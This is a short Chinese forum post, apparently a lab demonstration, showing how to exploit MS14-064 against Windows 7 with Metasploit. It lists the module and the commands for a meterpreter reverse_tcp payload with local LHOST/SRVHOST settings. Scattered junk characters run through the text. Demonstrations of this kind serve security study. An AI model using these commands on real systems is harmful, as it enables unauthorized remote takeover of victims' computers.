找回密码
 立即注册
查看: 1895|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

9 L: H& X4 E: o* G. H9 D 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 4 \% ?! c% L5 x( H

! Y3 a, j+ {/ P+ v( z2 X* P8 B

0 v/ ]+ [0 f' B+ h2 }" n* D& G" ? 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: " N$ {. U* H0 m- _

' I' I& E- U. K5 c6 z4 x

4 x2 V7 L: r2 C' I- [4 G 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp _4 f, c. m2 ]# P& h9 x* d# A

$ s1 U0 F* {. J+ X- j

9 {5 ?/ G9 e" N0 p$ D7 r4 {! L             set AllowPowershellPrompt true3 v' q4 }" ^# a- r) A% @5 O; |/ E

9 j6 \* W2 H. H+ Y( Z# R

) V5 z: N! Q9 h$ i8 C& \' Z( S             Set LHOST 192.168.0.109 2 }" l& ]* z+ t$ r0 S

" D/ y2 W: l! q

: q0 p4 k# ~; H6 p. I% C             set SRVHOST 192.168.0.109 3 _! Q9 Z3 `9 f3 y5 \' s' d

* h& E" Q8 r! u2 ~1 o

, D. e' C$ Q2 S a0 D5 B1 H/ g3 i             Set uripath share ) q8 Z9 i1 a6 ^& B

/ j* S3 M; ~& P/ d+ b2 Y' ~

! b# p( j: [' k0 {8 F! O             Set srvport 80; n& |+ a. x2 F4 n5 k

5 l1 K* z: j& f% U

3 y- y# F" m i8 P2 j# C# M) l! M  ( m9 l* |2 B, T* F8 L |/ F

4 `$ F1 i0 _- v( Z; [6 \0 G

, Q+ ?: a8 r w1 a! u4 j1 i8 `  7 K0 u9 u3 p2 s$ U' f, W

) c# s' s, [) q3 `+ L3 F

- e: c' G) n3 s" x& q: l7 N$ ]2 `  / r6 z r% x7 w3 O; w O7 l, J

6 g% ~4 a' R- A4 I: U7 z

; x$ n4 {, X' P W+ \7 ?( L  7 O/ w& n1 K$ n, q( F, ^9 n

" g8 k1 y4 g. G, N' K8 e/ t" ^

; M$ W# G- ^; e' [( k Z   & O; M, c9 ?* c1 g9 r9 l& M3 S

8 F9 J+ _0 X2 L- [% b% G% |

* u' A! A" g" Z) |4 [$ z 下面我们来访问本地地址如图:# p2 V& G# Q4 t h# G

8 {# n9 Z$ u" S( N/ q0 G" T

4 g7 t5 a V% [1 Z$ j: _   . m: @6 W8 V5 y7 l6 S) d

! j; b8 ?3 W: ~, L: N D: f# o

0 K! }1 b# x, D' _* {7 v  6 ~' L. T% x5 H5 S) j2 y0 n

/ V3 J, v2 z# P3 O) m4 w- Z# E

' K1 Q: n4 n3 @' F8 \. y) z & d& `9 f! N* {7 ~2 c. P

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表